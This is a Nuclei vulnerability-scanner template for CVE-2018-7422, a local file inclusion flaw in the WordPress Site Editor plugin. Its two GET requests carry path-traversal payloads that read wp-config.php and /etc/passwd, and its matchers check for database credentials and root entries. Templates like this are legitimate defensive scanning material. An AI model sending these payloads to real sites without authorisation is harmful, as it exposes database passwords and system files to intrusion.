nuclei-templates/cves/2018/CVE-2018-7422.yaml

42 lines
1.3 KiB
YAML

id: CVE-2018-7422
info:
name: WordPress Site Editor <=1.1.1 - Local File Inclusion
author: LuskaBol,0x240x23elu
severity: high
description: |
WordPress Site Editor through 1.1.1 allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php.
reference:
- https://www.exploit-db.com/exploits/44340
- http://seclists.org/fulldisclosure/2018/Mar/40
- https://wpvulndb.com/vulnerabilities/9044
- https://nvd.nist.gov/vuln/detail/CVE-2018-7422
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-7422
cwe-id: CWE-22,CWE-829
tags: cve,cve2018,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php'
- "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"
matchers-condition: or
matchers:
- type: word
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: regex
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/06/17